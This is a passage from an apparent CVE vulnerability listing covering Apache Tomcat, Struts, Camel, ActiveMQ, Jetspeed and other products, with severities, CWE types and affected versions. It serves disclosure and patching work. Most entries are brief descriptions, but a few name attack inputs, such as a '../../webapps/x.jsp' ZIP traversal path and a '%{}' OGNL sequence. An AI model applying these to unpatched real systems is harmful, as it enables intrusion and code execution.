apache tomcat 8.0.14
apache tomcat 7.0.12
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.28
apache tomcat 7.0.62
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 8.0.23
apache tomcat 7.0.40
debian debian_linux 8.0
canonical ubuntu_linux 16.04
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 9.0.0
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 7.0.25
apache tomcat 7.0.57
apache tomcat 8.0.21
apache tomcat 7.0.37
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 8.0.17
canonical ubuntu_linux 15.10
apache tomcat 7.0.35
apache tomcat 7.0.64
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
canonical ubuntu_linux 12.04
apache tomcat 7.0.61
apache tomcat 8.0.15
apache tomcat 7.0.29
canonical ubuntu_linux 14.04
apache tomcat 8.0.26
apache tomcat 7.0.34
apache tomcat 7.0.20
apache tomcat 7.0.14
apache tomcat 8.0.24
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
debian debian_linux 7.0
apache tomcat 7.0.26
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 7.0.27
apache tomcat 7.0.2
apache tomcat 8.0.28
apache tomcat 7.0.52
apache tomcat 7.0.63
apache tomcat 7.0.53
apache tomcat 7.0.22
apache tomcat 7.0.30
apache tomcat 8.0.18
CVE-2015-5347 MEDIUM

Cross-site scripting (XSS) vulnerability in the getWindowOpenJavaScript function in org.apache.wicket.extensions.ajax.markup.html.modal.ModalWindow in Apache Wicket 1.5.x before 1.5.15, 6.x before 6.22.0, and 7.x before 7.2.0 might allow remote attackers to inject arbitrary web script or HTML via a ModalWindow title.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache wicket *
CVE-2015-5348 MEDIUM

Apache Camel 2.6.x through 2.14.x, 2.15.x before 2.15.5, and 2.16.x before 2.16.1, when using (1) camel-jetty or (2) camel-servlet as a consumer in Camel routes, allow remote attackers to execute arbitrary commands via a crafted serialized Java object in an HTTP request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-19,

Products Affected

Vendor Product Version
apache camel 2.14.0
apache camel 2.13.4
apache camel 2.9.4
apache camel 2.10.7
apache camel 2.9.5
apache camel 2.13.1
apache camel 2.14.2
apache camel 2.10.1
apache camel 2.9.8
apache camel 2.8.4
apache camel 2.6.0
apache camel 2.10.4
apache camel 2.11.2
apache camel 2.14.3
apache camel 2.8.6
apache camel 2.7.1
apache camel 2.9.1
apache camel 2.13.3
apache camel 2.8.0
apache camel 2.9.0
apache camel 2.12.4
apache camel 2.13.0
apache camel 2.14.4
apache camel 2.8.3
apache camel 2.10.3
apache camel 2.11.1
apache camel 2.7.0
apache camel 2.15.1
apache camel 2.16.0
apache camel 2.12.5
apache camel 2.10.2
apache camel 2.8.2
apache camel 2.15.0
apache camel 2.12.3
apache camel 2.7.5
apache camel 2.9.6
apache camel 2.7.4
apache camel 2.15.2
apache camel 2.7.2
apache camel 2.11.3
apache camel 2.11.4
apache camel 2.15.3
apache camel 2.7.3
apache camel 2.10.5
apache camel 2.11.0
apache camel 2.12.2
apache camel 2.12.0
apache camel 2.12.1
apache camel 2.9.2
apache camel 2.10.0
apache camel 2.14.1
apache camel 2.9.7
apache camel 2.8.5
apache camel 2.10.6
apache camel 2.13.2
apache camel 2.8.1
apache camel 2.15.4
apache camel 2.9.3
CVE-2015-5349 HIGH

The CSV export in Apache LDAP Studio and Apache Directory Studio before 2.0.0-M10 does not properly escape field values, which might allow attackers to execute arbitrary commands by leveraging a crafted LDAP entry that is interpreted as a formula when imported into a spreadsheet.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-77,

Products Affected

Vendor Product Version
apache directory_studio 1.3.0
apache directory_studio 1.5.3
apache directory_studio 1.0.0
apache directory_studio 1.1.0
apache directory_studio 1.2.0
apache directory_studio 1.5.2
apache ldap_studio 0.8.0
apache ldap_studio 0.7.0
apache ldap_studio 0.8.1
apache ldap_studio 0.6.0
apache directory_studio 1.4.0
apache directory_studio 1.0.1
apache directory_studio 1.5.0
apache directory_studio 2.0.0
apache directory_studio 1.5.1
CVE-2015-5351 MEDIUM

The (1) Manager and (2) Host Manager applications in Apache Tomcat 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 establish sessions and send CSRF tokens for arbitrary new requests, which allows remote attackers to bypass a CSRF protection mechanism by using a token.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.0.0
apache tomcat 8.0.20
apache tomcat 7.0.39
apache tomcat 8.0.22
apache tomcat 7.0.56
apache tomcat 8.0.14
apache tomcat 7.0.12
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.28
apache tomcat 7.0.62
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 8.0.23
apache tomcat 7.0.40
debian debian_linux 8.0
canonical ubuntu_linux 16.04
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 9.0.0
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 7.0.25
apache tomcat 7.0.57
apache tomcat 8.0.21
apache tomcat 7.0.37
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 8.0.17
canonical ubuntu_linux 15.10
apache tomcat 7.0.35
apache tomcat 7.0.64
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
canonical ubuntu_linux 12.04
apache tomcat 7.0.61
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 7.0.29
canonical ubuntu_linux 14.04
apache tomcat 8.0.30
apache tomcat 8.0.26
apache tomcat 7.0.34
apache tomcat 7.0.20
apache tomcat 7.0.14
apache tomcat 8.0.24
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
debian debian_linux 7.0
apache tomcat 7.0.26
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 7.0.27
apache tomcat 7.0.2
apache tomcat 8.0.28
apache tomcat 7.0.52
apache tomcat 7.0.63
apache tomcat 7.0.53
apache tomcat 7.0.22
apache tomcat 7.0.30
apache tomcat 8.0.18
CVE-2015-6420 HIGH

Serialized-object interfaces in certain Cisco Collaboration and Social Media; Endpoint Clients and Client Software; Network Application, Service, and Acceleration; Network and Content Security Devices; Network Management and Provisioning; Routing and Switching - Enterprise and Service Provider; Unified Computing; Voice and Unified Communications Devices; Video, Streaming, TelePresence, and Transcoding Devices; Wireless; and Cisco Hosted Services products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache commons_collections *
apache commons_collections 4.0
CVE-2015-6524 MEDIUM

The LDAPLoginModule implementation in the Java Authentication and Authorization Service (JAAS) in Apache ActiveMQ 5.x before 5.10.1 allows wildcard operators in usernames, which allows remote attackers to obtain credentials via a brute force attack. NOTE: this identifier was SPLIT from CVE-2014-3612 per ADT2 due to different vulnerability types.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-255,

Products Affected

Vendor Product Version
apache activemq 5.6.0
apache activemq 5.3.1
apache activemq 5.4.2
fedoraproject fedora 23
apache activemq 5.8.0
apache activemq 5.9.0
apache activemq 5.5.0
apache activemq 5.4.0
apache activemq 5.4.3
apache activemq 5.1.0
apache activemq 5.3.2
apache activemq 5.3.0
apache activemq 5.0.0
apache activemq 5.10.0
fedoraproject fedora 22
apache activemq 5.5.1
apache activemq 5.7.0
apache activemq 5.2.0
apache activemq 5.4.1
apache activemq 5.9.1
CVE-2015-7430 MEDIUM

The Hadoop connector 1.1.1, 2.4, 2.5, and 2.7.0-0 before 2.7.0-3 for IBM Spectrum Scale and General Parallel File System (GPFS) allows local users to read or write to arbitrary GPFS data via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache hadoop 2.5.0
apache hadoop 2.4.0
apache hadoop 2.7.0
apache hadoop 1.1.1
CVE-2015-7520 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the (1) RadioGroup and (2) CheckBoxMultipleChoice classes in Apache Wicket 1.5.x before 1.5.15, 6.x before 6.22.0, and 7.x before 7.2.0 allow remote attackers to inject arbitrary web script or HTML via a crafted "value" attribute in a <input> element.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache wicket *
CVE-2015-7521 HIGH

The authorization framework in Apache Hive 1.0.0, 1.0.1, 1.1.0, 1.1.1, 1.2.0 and 1.2.1, on clusters protected by Ranger and SqlStdHiveAuthorization, allows attackers to bypass intended parent table access restrictions via unspecified partition-level operations.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache hive 1.1.0
apache hive 1.0.0
apache hive 1.0.1
apache hive 1.2.0
apache hive 1.2.1
CVE-2015-7559 MEDIUM

It was found that the Apache ActiveMQ client before 5.14.5 exposed a remote shutdown command in the ActiveMQConnection class. An attacker logged into a compromised broker could use this flaw to achieve denial of service on a connected client.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 2.7 LOW CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L 1.2 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-306,CWE-20,

Products Affected

Vendor Product Version
redhat jboss_fuse 6.3
redhat jboss_a-mq 6.2.1
redhat jboss_a-mq 6.3
apache activemq *
CVE-2015-7611 HIGH

Apache James Server 2.3.2, when configured with file-based user repositories, allows attackers to execute arbitrary system commands via unspecified vectors.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache james_server 2.3.2
CVE-2015-8320 MEDIUM

Apache Cordova-Android before 3.7.0 improperly generates random values for BridgeSecret data, which makes it easier for attackers to conduct bridge hijacking attacks by predicting a value.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache cordova *
CVE-2015-8795 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the Admin UI in Apache Solr before 5.1 allow remote attackers to inject arbitrary web script or HTML via crafted fields that are mishandled during the rendering of the (1) Analysis page, related to webapp/web/js/scripts/analysis.js or (2) Schema-Browser page, related to webapp/web/js/scripts/schema-browser.js.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache solr *
CVE-2015-8796 MEDIUM

Cross-site scripting (XSS) vulnerability in webapp/web/js/scripts/schema-browser.js in the Admin UI in Apache Solr before 5.3 allows remote attackers to inject arbitrary web script or HTML via a crafted schema-browse URL.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache solr *
CVE-2015-8797 MEDIUM

Cross-site scripting (XSS) vulnerability in webapp/web/js/scripts/plugins.js in the stats page in the Admin UI in Apache Solr before 5.3.1 allows remote attackers to inject arbitrary web script or HTML via the entry parameter to a plugins/cache URI.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache solr *
CVE-2016-0706 MEDIUM

Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 does not place org.apache.catalina.manager.StatusManagerServlet on the org/apache/catalina/core/RestrictedServlets.properties list, which allows remote authenticated users to bypass intended SecurityManager restrictions and read arbitrary HTTP requests, and consequently discover session ID values, via a crafted web application.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 8.0.20
apache tomcat 8.0.22
apache tomcat 8.0.14
apache tomcat 6.0.43
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 6.0.29
apache tomcat 6.0.37
apache tomcat 7.0.62
apache tomcat 7.0.33
apache tomcat 6.0.36
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 6.0.4
apache tomcat 6.0.2
canonical ubuntu_linux 16.04
apache tomcat 9.0.0
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.57
apache tomcat 6.0.33
apache tomcat 8.0.17
apache tomcat 7.0.64
apache tomcat 6.0.13
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 6.0.26
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 6.0.20
apache tomcat 6.0.30
apache tomcat 7.0.6
debian debian_linux 7.0
apache tomcat 7.0.27
apache tomcat 6.0.24
apache tomcat 7.0.53
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.41
apache tomcat 8.0.18
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.0.0
apache tomcat 7.0.39
apache tomcat 7.0.56
apache tomcat 6.0.1
apache tomcat 7.0.12
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 8.0.23
apache tomcat 6.0.44
debian debian_linux 8.0
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.25
apache tomcat 8.0.21
apache tomcat 7.0.37
apache tomcat 7.0.54
apache tomcat 7.0.42
canonical ubuntu_linux 15.10
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
canonical ubuntu_linux 12.04
apache tomcat 7.0.61
apache tomcat 6.0.39
apache tomcat 7.0.29
canonical ubuntu_linux 14.04
apache tomcat 8.0.30
apache tomcat 8.0.26
apache tomcat 7.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 8.0.24
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 8.0.28
apache tomcat 7.0.52
apache tomcat 7.0.63
apache tomcat 7.0.22
apache tomcat 6.0.35
CVE-2016-0707 LOW

The agent in Apache Ambari before 2.1.2 uses weak permissions for the (1) /var/lib/ambari-agent/data and (2) /var/lib/ambari-agent/keys directories, which allows local users to obtain sensitive information by reading files in the directories.

CVSS 2.0

Severity: LOW

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache ambari *
CVE-2016-0709 HIGH

Directory traversal vulnerability in the Import/Export function in the Portal Site Manager in Apache Jetspeed before 2.3.1 allows remote authenticated administrators to write to arbitrary files, and consequently execute arbitrary code, via a .. (dot dot) in a ZIP archive entry, as demonstrated by "../../webapps/x.jsp."

CVSS 2.0

Severity: HIGH

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache jetspeed *
CVE-2016-0710 HIGH

Multiple SQL injection vulnerabilities in the User Manager service in Apache Jetspeed before 2.3.1 allow remote attackers to execute arbitrary SQL commands via the (1) role or (2) user parameter to services/usermanager/users/.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache jetspeed *
CVE-2016-0711 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in Apache Jetspeed before 2.3.1 allow remote attackers to inject arbitrary web script or HTML via the title parameter when adding a (1) link, (2) page, or (3) folder resource.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jetspeed *
CVE-2016-0712 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache Jetspeed before 2.3.1 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to portal.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jetspeed *
CVE-2016-0714 MEDIUM

The session-persistence implementation in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 mishandles session attributes, which allows remote authenticated users to bypass intended SecurityManager restrictions and execute arbitrary code in a privileged context via a web application that places a crafted object in a session.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 8.0.20
apache tomcat 8.0.22
apache tomcat 8.0.14
apache tomcat 6.0.43
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 6.0.29
apache tomcat 6.0.37
apache tomcat 7.0.62
apache tomcat 7.0.33
apache tomcat 6.0.36
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 6.0.4
apache tomcat 6.0.2
canonical ubuntu_linux 16.04
apache tomcat 9.0.0
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.57
apache tomcat 6.0.33
apache tomcat 8.0.17
apache tomcat 7.0.64
apache tomcat 6.0.13
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 6.0.26
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 6.0.20
apache tomcat 6.0.30
apache tomcat 7.0.6
debian debian_linux 7.0
apache tomcat 7.0.27
apache tomcat 6.0.24
apache tomcat 7.0.53
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.41
apache tomcat 8.0.18
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.0.0
apache tomcat 7.0.39
apache tomcat 7.0.56
apache tomcat 6.0.1
apache tomcat 7.0.12
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 8.0.23
apache tomcat 6.0.44
debian debian_linux 8.0
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.25
apache tomcat 8.0.21
apache tomcat 7.0.37
apache tomcat 7.0.54
apache tomcat 7.0.42
canonical ubuntu_linux 15.10
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
canonical ubuntu_linux 12.04
apache tomcat 7.0.61
apache tomcat 6.0.39
apache tomcat 7.0.29
canonical ubuntu_linux 14.04
apache tomcat 8.0.30
apache tomcat 8.0.26
apache tomcat 7.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 8.0.24
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 8.0.28
apache tomcat 7.0.52
apache tomcat 7.0.63
apache tomcat 7.0.22
apache tomcat 6.0.35
CVE-2016-0731 MEDIUM

The File Browser View in Apache Ambari before 2.2.1 allows remote authenticated administrators to read arbitrary files via a file: URL in the WebHDFS URL configuration.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache ambari *
CVE-2016-0733 HIGH

The Admin UI in Apache Ranger before 0.5.1 does not properly handle authentication requests that lack a password, which allows remote attackers to bypass authentication by leveraging knowledge of a valid username.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache ranger *
CVE-2016-0734 MEDIUM

The web-based administration console in Apache ActiveMQ 5.x before 5.13.2 does not send an X-Frame-Options HTTP header, which makes it easier for remote attackers to conduct clickjacking attacks via a crafted web page that contains a (1) FRAME or (2) IFRAME element.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-254,

Products Affected

Vendor Product Version
apache activemq 5.6.0
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 5.11.1
apache activemq 5.8.0
apache activemq 5.9.0
apache activemq 5.13.0
apache activemq 5.12.1
apache activemq 5.4.0
apache activemq 5.4.3
apache activemq 5.1.0
apache activemq 5.3.0
apache activemq 5.0.0
apache activemq 5.10.0
apache activemq 5.10.1
apache activemq 5.7.0
apache activemq 5.11.2
apache activemq 5.4.1
apache activemq 5.10.2
apache activemq 5.9.1
apache activemq 5.12.2
apache activemq 5.11.0
apache activemq 5.5.0
apache activemq 5.12.0
apache activemq 5.3.2
apache activemq 5.5.1
apache activemq 5.2.0
CVE-2016-0735 MEDIUM

Apache Ranger 0.5.x before 0.5.2 allows remote authenticated users to bypass intended parent resource-level access restrictions by leveraging mishandling of a resource-level exclude policy.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache ranger 0.5.1
apache ranger 0.5.0
CVE-2016-0736 MEDIUM

In Apache HTTP Server versions 2.4.0 to 2.4.23, mod_session_crypto was encrypting its data/cookie using the configured ciphers with possibly either CBC or ECB modes of operation (AES256-CBC by default), hence no selectable or builtin authenticated encryption. This made it vulnerable to padding oracle attacks, particularly with CBC.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache http_server 2.4.7
apache http_server 2.4.0
apache http_server 2.4.19
apache http_server 2.4.23
apache http_server 2.4.2
apache http_server 2.4.6
apache http_server 2.4.20
apache http_server 2.4.12
apache http_server 2.4.22
apache http_server 2.4.3
apache http_server 2.4.16
apache http_server 2.4.10
apache http_server 2.4.1
apache http_server 2.4.8
apache http_server 2.4.9
apache http_server 2.4.21
apache http_server 2.4.14
CVE-2016-0760 MEDIUM

Multiple incomplete blacklist vulnerabilities in Apache Sentry before 1.7.0 allow remote authenticated users to execute arbitrary code via the (1) reflect, (2) reflect2, or (3) java_method Hive builtin functions.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache sentry 1.6.0
apache sentry 1.5.1
CVE-2016-0762 MEDIUM

The Realm implementations in Apache Tomcat versions 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 did not process the supplied password if the supplied user name did not exist. This made a timing attack possible to determine valid user names. Note that the default configuration includes the LockOutRealm which makes exploitation of this vulnerability harder.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-203,

Products Affected

Vendor Product Version
netapp snap_creator_framework -
redhat enterprise_linux_eus 7.7
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.6
netapp oncommand_shift -
oracle communications_diameter_signaling_router *
redhat enterprise_linux_eus 7.5
redhat enterprise_linux_eus 7.6
debian debian_linux 8.0
apache tomcat *
redhat enterprise_linux_eus 7.4
redhat enterprise_linux_server_aus 7.7
canonical ubuntu_linux 16.04
redhat enterprise_linux_server_tus 7.7
netapp oncommand_insight -
apache tomcat 9.0.0
oracle tekelec_platform_distribution *
redhat jboss_enterprise_web_server 3.0.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server 7.0
CVE-2016-0763 MEDIUM

The setGlobalContext method in org/apache/naming/factory/ResourceLinkFactory.java in Apache Tomcat 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M3 does not consider whether ResourceLinkFactory.setGlobalContext callers are authorized, which allows remote authenticated users to bypass intended SecurityManager restrictions and read or write to arbitrary application data, or cause a denial of service (application disruption), via a web application that sets a crafted global context.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.0.0
apache tomcat 8.0.20
apache tomcat 7.0.39
apache tomcat 8.0.22
apache tomcat 7.0.56
apache tomcat 8.0.14
apache tomcat 7.0.12
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.28
apache tomcat 7.0.62
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 8.0.23
apache tomcat 7.0.40
debian debian_linux 8.0
canonical ubuntu_linux 16.04
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 9.0.0
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 7.0.25
apache tomcat 7.0.57
apache tomcat 8.0.21
apache tomcat 7.0.37
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 8.0.17
canonical ubuntu_linux 15.10
apache tomcat 7.0.35
apache tomcat 7.0.64
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
canonical ubuntu_linux 12.04
apache tomcat 7.0.61
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 7.0.29
canonical ubuntu_linux 14.04
apache tomcat 8.0.30
apache tomcat 8.0.26
apache tomcat 7.0.34
apache tomcat 7.0.20
apache tomcat 7.0.14
apache tomcat 8.0.24
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
debian debian_linux 7.0
apache tomcat 7.0.26
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 7.0.27
apache tomcat 7.0.2
apache tomcat 8.0.28
apache tomcat 7.0.52
apache tomcat 7.0.63
apache tomcat 7.0.53
apache tomcat 7.0.22
apache tomcat 7.0.30
apache tomcat 8.0.18
CVE-2016-0779 HIGH

The EjbObjectInputStream class in Apache TomEE before 1.7.4 and 7.x before 7.0.0-M3 allows remote attackers to execute arbitrary code via a crafted serialized object.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache tomee *
apache tomee 7.0.0
CVE-2016-0782 LOW

The administration web console in Apache ActiveMQ 5.x before 5.11.4, 5.12.x before 5.12.3, and 5.13.x before 5.13.2 allows remote authenticated users to conduct cross-site scripting (XSS) attacks and consequently obtain sensitive information from a Java memory dump via vectors related to creating a queue.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache activemq 5.6.0
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 5.11.1
apache activemq 5.8.0
apache activemq 5.9.0
apache activemq 5.13.0
apache activemq 5.12.1
apache activemq 5.4.0
apache activemq 5.4.3
apache activemq 5.1.0
apache activemq 5.3.0
apache activemq 5.10.0
apache activemq 5.10.1
apache activemq 5.7.0
apache activemq 5.11.2
apache activemq 5.11.3
apache activemq 5.13.1
apache activemq 5.4.1
apache activemq 5.10.2
apache activemq 5.9.1
apache activemq 5.12.2
apache activemq 5.11.0
apache activemq 5.5.0
apache activemq 5.12.0
apache activemq 5.3.2
apache activemq 5.5.1
apache activemq 5.2.0
CVE-2016-0783 MEDIUM

The sendHashByUser function in Apache OpenMeetings before 3.1.1 generates predictable password reset tokens, which makes it easier for remote attackers to reset arbitrary user passwords by leveraging knowledge of a user name and the current system time.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2016-0784 MEDIUM

Directory traversal vulnerability in the Import/Export System Backups functionality in Apache OpenMeetings before 3.1.1 allows remote authenticated administrators to write to arbitrary files via a .. (dot dot) in a ZIP archive entry.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2016-0785 HIGH

Apache Struts 2.x before 2.3.28 allows remote attackers to execute arbitrary code via a "%{}" sequence in a tag attribute, aka forced double OGNL evaluation.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts *
CVE-2016-0956 HIGH

The Servlets Post component 2.3.6 in Apache Sling, as used in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0, allows remote attackers to obtain sensitive information via unspecified vectors.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache sling *
adobe experience_manager 6.1.0
adobe experience_manager 6.0.0
adobe experience_manager 5.6.1
CVE-2016-1000031 HIGH

Apache Commons FileUpload before 1.3.3 DiskFileItem File Manipulation Remote Code Execution

CVSS 2.0

Severity: HIGH

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache commons_fileupload *
CVE-2016-1000104 MEDIUM

A security Bypass vulnerability exists in the FcgidPassHeader Proxy in mod_fcgid through 2016-07-07.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
opensuse leap 42.1
opensuse opensuse 13.2
apache mod_fcgid *
CVE-2016-1181 MEDIUM

ActionServlet.java in Apache Struts 1 1.x through 1.3.10 mishandles multithreaded access to an ActionForm instance, which allows remote attackers to execute arbitrary code or cause a denial of service (unexpected memory access) via a multipart request, a related issue to CVE-2015-0899.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache struts 1.2.4
apache struts 1.3.6
apache struts 1.3.5
apache struts 1.0.1
oracle banking_platform 2.4.1
oracle portal 11.1.1.6
apache struts 1.2.3
apache struts 1.0.2
apache struts 1.2.6
oracle banking_platform 2.3.0
